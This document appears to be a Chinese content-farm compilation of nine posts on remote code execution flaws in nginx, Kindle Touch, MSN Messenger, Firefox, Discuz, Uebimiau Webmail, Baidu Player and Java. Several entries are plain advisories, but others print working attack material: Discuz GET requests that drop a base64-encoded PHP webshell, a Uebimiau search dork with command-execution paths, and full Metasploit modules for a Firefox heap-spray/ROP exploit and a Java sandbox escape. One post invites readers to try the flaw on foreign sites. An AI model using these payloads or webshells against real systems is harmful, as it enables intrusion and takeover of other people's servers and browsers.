Ngnix出现高危漏洞，可远程执行代码

“得闲”通过精心收集，向本站投稿了9篇Ngnix出现高危漏洞，可远程执行代码，以下是小编帮大家整理后的Ngnix出现高危漏洞，可远程执行代码，供大家参考借鉴，希望可以帮助到您。

篇1：Ngnix出现高危漏洞，可远程执行代码

Nginx %00空字节执行任意代码(php)漏洞

Ngnix在遇到%00空字节时与后端FastCGI处理不一致，导致可以在图片中嵌入PHP代码然后通过访问xxx.jpg%00.php来执行其中的代码

影响版本：

nginx 0.5.*

nginx 0.6.*

nginx 0.7 <= 0.7.65

nginx 0.8 <= 0.8.37

In vulnerable versions of nginx, null bytes are allowed in URIs by default (their presence is indicated via a variable named zero_in_uri defined in ngx_http_request.h).

Individual modules have the ability to opt-out of handling URIs with null bytes. However, not all of them do; in particular, the FastCGI module does not.

<*参考

nealpoole.com/blog//07/possible-arbitrary-code-execution-with-null-bytes-php-and-old-versions-of-nginx/

*>

篇2：Kindle Touch远程代码执行漏洞漏洞预警

不知道有没有amazon的kindle迷呢？最近国外媒体报道Kindle Touch出现了远程可执行代码漏洞，针对Kindle Touch 5.1.0 版本固件，可以远程执行代码，把/etc/shadow文件发送到指定的web服务器。 漏洞涉及到/usr/lib/libkindleplugin.so插件，Kindle Touch内置的浏览器WebKit会使用该插件。当用户浏览特定的网页时，就会以root权限执行特制的代码。

当前amazon还没有相关补丁。可能会在下一个版本的固件升级中修复，

临时的修复方法可参考：

mntroot rw && mv /usr/lib/browser/plugins/libkindleplugin.so /usr/lib/browser/plugins/libkindleplugin.so.disabled && mntroot ro && killall wafapp 实际上只要有关注Kindle Touch的用户都应该知道，早就有越狱的方法可以直接进入Kindle的root了。各种优化中文字体的方法都建立在越狱基础上。所以这次出现的“远程可执行代码漏洞”更多的是提供多一种另类“远程”越狱方法罢了。而且应该很少用户使用Kindle Touch来浏览网页，因为用户体验不太好。但是，还是需要使用Kindle Touch的用户注意安全。

篇3：discuz!7.1、7.2远程代码执行漏洞exp

摘自：1943'S BLOG

www.smxiaoqiang.cn/blog/275.html

感谢WJS和冰冷的太阳，老君分析过了，我就不多说了，使用exp的话仅限本机测试，其他用途后果自负！

第一种方法：

先注册个用户然后把

帖子ID，指定一个存在的帖子即可：

chr解码后是：value=“${${evalfputs(fopen('forumdata/cache/usergroup','w'),'

里面有个提交地址改下，保存html

打开点提交，会生产forumdata/cache/usergroup_01.php一句话文件，密码是cmd

第二种方法：

直接GET，利用语句：

misc.php?action=imme_binding&response[result]=aa:b&scriptlang[aa][b]={${fputs(fopen(base64_decode(Yy5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))}}

在根目录生成C.PHP密码是C

临时修补方法：

在common.inc.php上面加上

$response=$scriptlang=array;

官方发布修补补丁：

www.discuz.net/thread-1537673-1-1.html

篇4：MSN中允许远程执行代码漏洞软件教程

更新日期： 九月 11,

版本： 1.0

此重要安全更新可消除 MSN Messenger 和 Windows Live Messenger 中公开披露的漏洞， 当用户接受攻击者的网络摄像机或视频聊天邀请时，漏洞可能允许远程执行代码。 成功利用此漏洞的攻击者可以完全控制受影响的系统。 那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。

使用 MSN Messenger 7.0.0820 或 Windows Live Messenger 8.1 的客户不受此漏洞的影响。

建议。 Microsoft 建议在 Microsoft Windows Service Pack 4 上使用 MSN Messenger 6.2 和 MSN Messenger 7.0 的客户尽早升级到 MSN Messenger 7.0.0820。 在其他受支持的 Windows平台上支持 MSN Messenger 6.2、MSN Messenger 7.0、MSN Messenger 7.5 或 Windows Live Messenger 8.0 的客户应尽早升级到 Windows Live Messenger 8.1。

受影响的软件

操作系统软件最大安全影响综合严重程度等级此更新替代的公告

Microsoft Windows 2000 Service Pack 4

MSN Messenger 6.2

MSN Messenger 7.0

远程执行代码

重要

无

Windows XP Service Pack 2

MSN Messenger 6.2

MSN Messenger 7.0

MSN Messenger 7.5

Windows Messenger 8.0

远程执行代码

重要

无

Windows XP Professional x64 Edition

MSN Messenger 6.2

MSN Messenger 7.0

MSN Messenger 7.5

Windows Messenger 8.0

远程执行代码

重要

无

Windows XP Professional x64 Edition Service Pack 2

MSN Messenger 6.2

MSN Messenger 7.0

MSN Messenger 7.5

Windows Messenger 8.0

远程执行代码

重要

无

Windows Server Service Pack 1 和 Windows Server 2003 Service Pack 2

MSN Messenger 6.2

MSN Messenger 7.0

MSN Messenger 7.5

Windows Messenger 8.0

远程执行代码

重要

无

Windows Server 2003 x64 Edition

MSN Messenger 6.2

MSN Messenger 7.0

MSN Messenger 7.5

Windows Messenger 8.0

远程执行代码

重要

无

Windows Server 2003 x64 Edition Service Pack 2

MSN Messenger 6.2

关 键 字：msn

篇5：火狐远程代码执行漏洞 Firefox 3.6.16漏洞预警

Firefox 3.6.16 OBJECT mChannel Remote Code Execution Exploit (DEP bypass)

CVE:-0065

OSVDB:72085

URL:bugzilla.mozilla.org/show_bug.cgi?id=634986

www.mozilla.org/security/announce/2011/mfsa2011-13.html

Exploit(MSF 17612.rb):

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = NormalRanking

#

# This module acts as an HTTP server

#

include Msf::Exploit::Remote::HttpServer::HTML

include Msf::Exploit::Remote::BrowserAutopwn

autopwn_info({

:ua_name =>HttpClients::FF,

:ua_minver =>”3.6.16“,

:ua_maxver =>”3.6.16“,

:os_name =>OperatingSystems::WINDOWS,

:javascript. =>true,

:rank =>NormalRanking,

})

def initialize(info = {})

super(update_info(info,

'Name'     =>'Mozilla Firefox 3.6.16 mChannel use after free Exploit',

'Description'  =>%q{

This module exploits an use after free vulnerability in Mozilla

Firefox 3.6.16. An OBJECT Element mChannel can be freed via the

OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel

becomes a dangling pointer and can be reused when setting the OBJECTs

data attribute. (Discovered by regenrecht). This module uses heapspray

with a minimal ROP chain to bypass DEP on Windows XP SP3

},

'License'    =>MSF_LICENSE,

'Author'    =>

[

'regenrecht', # discovery

'Rh0'  # wrote metasploit module

],

'Version'    =>'0.0',

'References'  =>

[

['CVE',  '2011-0065'],

['OSVDB', '72085'],

['URL',  'bugzilla.mozilla.org/show_bug.cgi?id=634986'],

['URL',  'www.mozilla.org/security/announce/2011/mfsa2011-13.html']

],

'DefaultOptions' =>

{

'EXITFUNC' =>'process',

'InitialAutoRunScript' =>'migrate -f',

},

'Payload'    =>

{

'Space'  =>1024,

'BadChars' =>”“,

},

'Targets'    =>

[ # worked with 100% reliability

[ 'Firefox 3.6.16, Windows XP SP3 (VirtualBox 4)',

{

'Platform' =>'win',

'Arch' =>ARCH_X86,

}

],

],

'DefaultTarget' =>0,

'DisclosureDate' =>'May 10 2011'

))

end

def on_request_uri(cli, request)

# Re-generate the payload

return if ((p = regenerate_payload(cli).encoded) == nil)

print_status(”Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...“)

send_response_html(cli, generate_html(p), { 'Content-Type' =>'text/html' })

# Handle the payload

handler(cli)

end

def generate_html(payload)

# DEP bypass

custom_stack = [

0x1052c871, # mov esp,[ecx] / mov edx,5c86c6ff add [eax],eax / xor eax,eax / pop esi / retN 0x8

0x7c801ad4, # VirtualProtect

0xbeeff00d,

0xbeeff00d,

0x7c874413, # jmp esp

0x0c0c0048, # start address

0x00000400, # size 1024

0x00000040, # Page EXECUTE_READ_WRITE

0x0c0c0c00 # old protection

].pack(”V*“)

payload_buf = ''

payload_buf << custom_stack

payload_buf << payload

escaped_payload = Rex::Text.to_unescape(payload_buf)

custom_js = %Q|

e = document.getElementById(”d“);

e.QueryInterface(Components.interfaces.nsIChannelEventSink).onChannelRedirect(null,new Object,0)

fake_obj_addr = unescape(”\\x0c%u0c0c“)

// taken and modified from adobe_flashplayer_newfunction.rb

var sc = unescape(”#{escaped_payload}“)

var ret_addr = unescape(”%u0024%u0c0c“)

while(ret_addr.length+20+8 < 0x100000) {ret_addr += ret_addr}

var b = ret_addr.substring(0,(0x48-0x24)/2)

b += sc

b += ret_addr

var next = b.substring(0,0x10000/2)

while(next.length<0x800000) {next += next}

var again = next.substring(0,0x80000 - (0x1020-0x08)/2)

array = new Array

for (n=0;n<0x1f0;n++){

array[n] = again + sc

}

e.data = ”“

|

return %Q|

|

end

end

From:www.exploit-db.com/exploits/17612/

篇6：远程文件执行代码漏洞利用方法漏洞预警

goole 搜 Uebimiau Webmail

地址后面加 /uebimiau/admin/editor.php?load=config 被人拿了 加 /uebimiau/index.php?cmd=id

全部是外国的 ，，，高手可以玩玩，。。。。。。

漏洞公布时间 6 。12

==========================================================

Uebimiau Webmail <= v3.2.0-1.8 Remote File / Overwrite Vulnerabilities

Dork : Uebimiau Webmail v3.2.0-1.8

POC :

/uebimiau/admin/editor.php?load=config

And You Can Write Any Code As

Go

/uebimiau/index.php?cmd=id

See Pic :www.almlf.com/get-6-2009-almlf_com_akszizl2.png

Thanx To

篇7：布百度影音远程代码执行漏洞漏洞预警

百度影音是国内一款不错的媒体播放软件，该软件在很多细节方面处理的人性化，但是，开发者在发布该软件的时候，没有将软件中使用的特殊库文件消除，导致百度影音播放器可以借此机会实现远程执行任意代码，

该库文件名称为“log.dll”，推测应该是带有调试性质的日志记录接口，将该文件与任意格式的媒体文件放置在同一目录下，当用户使用百度影音播放媒体文件时，“log.dll”文件将会被同时加载，如果该文件为恶意攻击者开发，那么就会直接造成用户系统受到攻击，

为此，恶意攻击者可以利用该漏洞，远程共享带有“log.dll”和媒体文件的文件夹，诱使用户访问，最终实现远程入侵用户系统。

修复方法：

代码剔除法或者本地设定法

最后百度官方给出的回复是：感谢提交.开发人员反馈没有那么严重.我们尽快修复.

篇8：Discuz! 7.1 & 7.2 远程代码执行漏洞漏洞预警

首先说一下，漏洞是t00ls核心群传出去的，xhming先去读的，然后我后来读的，读出来的都是代码执行，1月5日夜里11点多钟，在核心群的 们的要求下，xhming给了个poc，我给了个exp，确实发现的是同一个问题，截止夜里2点多种我下线，还只有t00ls核心群里几个人知道我给出的exp，可我怎么也想不到，经过半天时间，exp就满天飞了，而且确实出自昨天我的那个版本。

不难想象，exp流传的速度，A与B关系好，A发给B；B与C是好朋友，B发给C...总有人耐不住性子，泄露点风声，于是就人手一份。最受不了的是，竟然有些SB在群里拿来叫卖；实在不想说什么，要叫卖什么时候轮到你？人心不古，以后有的话还是自己藏着吧。

上午漏洞告诉了Saiy，DZ官方的补丁很快就出来了吧。

特别说明：产生漏洞的$scriptlang数组在安装插件后已经初始化，因此有安装插件的用户不受影响。

漏洞介绍：

Discuz！新版本7.1与7.2版本中的showmessage函数中eval中执行的参数未初始化，可以任意提交，从而可以执行任意PHP命令。

漏洞分析：

下面来分析下这个远程代码执行漏洞，这个问题真的很严重，可以直接写shell的：

一、漏洞来自showmessage函数：

function showmessage($message, $url_forward = '', $extra = '', $forwardtype = 0) {

extract($GLOBALS, EXTR_SKIP);//危险的用法，未初始化的变量可以直接带进函数，直接导致了问题产生，from www.oldjun.com

global $hookscriptmessage, $extrahead, $discuz_uid, $discuz_action, $debuginfo, $seccode, $seccodestatus, $fid, $tid, $charset, $show_message, $inajax, $_DCACHE, $advlist;

define('CACHE_FORBIDDEN', TRUE);

$hookscriptmessage = $show_message = $message;$messagehandle = 0;

$msgforward = unserialize($_DCACHE['settings']['msgforward']);

$refreshtime = intval($msgforward['refreshtime']);

$refreshtime = empty($forwardtype) ? $refreshtime : ($refreshtime ? $refreshtime : 3);

$msgforward['refreshtime'] = $refreshtime * 1000;

$url_forward = empty($url_forward) ? '' : (empty($_DCOOKIE['sid']) && $transsidstatus ? transsid($url_forward) : $url_forward);

$seccodecheck = $seccodestatus & 2;

if($_DCACHE['settings']['funcsiteid'] && $_DCACHE['settings']['funckey'] && $funcstatinfo && !IS_ROBOT) {

$statlogfile = DISCUZ_ROOT.'./forumdata/funcstat.log';

if($fp = @fopen($statlogfile, 'a')) {

@flock($fp, 2);

if(is_array($funcstatinfo)) {

$funcstatinfo = array_unique($funcstatinfo);

foreach($funcstatinfo as $funcinfo) {

fwrite($fp, funcstat_query($funcinfo, $message).”\n“);

}

} else {

fwrite($fp, funcstat_query($funcstatinfo, $message).”\n“);

}

fclose($fp);

$funcstatinfo = $GLOBALS['funcstatinfo'] = '';

}

}

if(!defined('STAT_DISABLED') && STAT_ID > 0 && !IS_ROBOT) {

write_statlog($message);

}

if($url_forward && (!empty($quickforward) || empty($inajax) && $msgforward['quick'] && $msgforward['messages'] && @in_array($message, $msgforward['messages']))) {

updatesession;

dheader(”location: “.str_replace('&', '&', $url_forward));

}

if(!empty($infloat)) {

if($extra) {

$messagehandle = $extra;

}

$extra = '';

}

if(in_array($extra, array('HALTED', 'NOPERM'))) {

$discuz_action = 254;

} else {

$discuz_action = 255;

}

include language('messages');

$vars = explode(':', $message);//只要含:就可以了

if(count($vars) == 2 && isset($scriptlang[$vars[0]][$vars[1]])) {//两个数字即可，用:分割

eval(”\$show_message = \“”.str_replace('“', '\”', $scriptlang[$vars[0]][$vars[1]]).“\”;“);//$scriptlang未初始化，可以自定义，from www.oldjun.com

} elseif(isset($language[$message])) {

$pre = $inajax ? 'ajax_' : '';

eval(”\$show_message = \“”.(isset($language[$pre.$message]) ? $language[$pre.$message] : $language[$message]).“\”;“);

unset($pre);

}

......

}

二、DZ的全局机制导致了未初始化的参数可以任意提交：

foreach(array('_COOKIE', '_POST', '_GET') as $_request) {

foreach($$_request as $_key => $_value) {

$_key{0} != '_' && $$_key = daddslashes($_value);

}

}

三、misc.php正好有个可以自定义message的点，其实也是未初始化：

elseif($action == 'imme_binding' && $discuz_uid) {

if(isemail($id)) {

$msn = $db->result_first(”SELECT msn FROM {$tablepre}memberfields WHERE uid='$discuz_uid'“);

$msn = explode(”\t“, $msn);

$id = dhtmlspecialchars(substr($id, 0, strpos($id, '@')));

$msn = ”$msn[0]\t$id“;

$db->query(”UPDATE {$tablepre}memberfields SET msn='$msn' WHERE uid='$discuz_uid'“);

showmessage('msn_binding_succeed', 'memcp.php');

} else {

if($result == 'Declined') {

dheader(”Location: memcp.php“);

} else {

showmessage($response['result']);//$response没有初始化，可以自定义，from www.oldjun.com

}

}

}

四、漏洞利用：

showmessage函数里$vars = explode(':', $message);然后message可以自己控制，于是就很容易了，参数是两个自定义的数组，

五、漏洞修复：

1.有补丁的打补丁；

2.没有补丁可以暂时先注释引起漏洞的语句，或者对两个变量赋个值。

poc：

（应Saiy的要求，不发exp了！）注册一个用户登陆,然后提交

misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]={${phpinfo()}}

篇9：Java Applet JMX远程代码执行漏洞预警

##

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# web site for more information on licensing and terms of use.

##

require 'msf/core'

require 'rex'

class Metasploit3 < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpServer::HTML

include Msf::Exploit::EXE

include Msf::Exploit::Remote::BrowserAutopwn

autopwn_info({ :javascript. =>false })

def initialize( info = {} )

super( update_info( info,

'Name'     =>'Java Applet JMX Remote Code Execution',

'Description' =>%q{

This module abuses the JMX classes from a Java Applet to run arbitrary Java code

outside of the sandbox as exploited in the wild in February of 2013. Additionally,

this module bypasses default security settings introduced in Java 7 Update 10 to run

unsigned applet without displaying any warning to the user.

},

'License'   =>MSF_LICENSE,

'Author'    =>

[

'Unknown', # Vulnerability discovery and exploit in the wild

'Adam Gowdiak', # Vulnerability discovery

'SecurityObscurity', # Exploit analysis and deobfuscation

'juan vazquez' # Metasploit module

],

'References'  =>

[

[ 'CVE', '2013-0431' ],

[ 'OSVDB', '89613' ],

[ 'BID', '57726' ],

[ 'URL', 'www.security-explorations.com/materials/SE-2012-01-ORACLE-8.pdf' ],

[ 'URL', 'www.security-explorations.com/materials/SE-2012-01-ORACLE-9.pdf' ],

[ 'URL', 'security-obscurity.blogspot.com.es/2013/01/about-new-java-0-day-vulnerability.html' ],

[ 'URL', 'pastebin.com/QWU1rqjf' ],

[ 'URL', 'malware.dontneedcoffee.com/2013/02/cve-2013-0431-java-17-update-11.html' ]

],

'Platform'   =>[ 'java', 'win', 'osx', 'linux' ],

'Payload'   =>{ 'Space' =>20480, 'BadChars' =>'', 'DisableNops' =>true },

'Targets'   =>

[

[ 'Generic (Java Payload)',

{

'Platform' =>['java'],

'Arch' =>ARCH_JAVA,

}

],

[ 'Windows x86 (Native Payload)',

{

'Platform' =>'win',

'Arch' =>ARCH_X86,

}

],

[ 'Mac OS X x86 (Native Payload)',

{

'Platform' =>'osx',

'Arch' =>ARCH_X86,

}

],

[ 'Linux x86 (Native Payload)',

{

'Platform' =>'linux',

'Arch' =>ARCH_X86,

}

],

],

'DefaultTarget' =>0,

'DisclosureDate' =>'Jan 19 2013'

))

end

def on_request_uri(cli, request)

print_status(”handling request for #{request.uri}“)

case request.uri

when /\.jar$/i

print_status(”Sending JAR“)

send_response( cli, generate_jar, { 'Content-Type' =>”application/octet-stream“ } )

when /\/$/

print_status(”Sending HTML“)

send_response_html(cli, generate_html, { 'Content-Type' =>'text/html' })

else

send_redirect(cli, get_resource() + '/', '')

end

end

def generate_jar

paths = [

[ ”Exploit.ser“ ],

[ ”Exploit.class“ ],

[ ”B.class“ ]

]

p = regenerate_payload(cli)

jar = p.encoded_jar

paths.each do |path|

1.upto(path.length - 1) do |idx|

full = path[0,idx].join(”/“) + ”/“

if !(jar.entries.map{|e|e.name}.include?(full))

jar.add_file(full, '')

end

end

fd = File.open(File.join( Msf::Config.install_root, ”data“, ”exploits“, ”cve-2013-0431“, path ), ”rb“)

data = fd.read(fd.stat.size)

jar.add_file(path.join(”/"), data)

fd.close

end

return jar.pack

end

def generate_html

html = <<-EOF

EOF

return html

end

end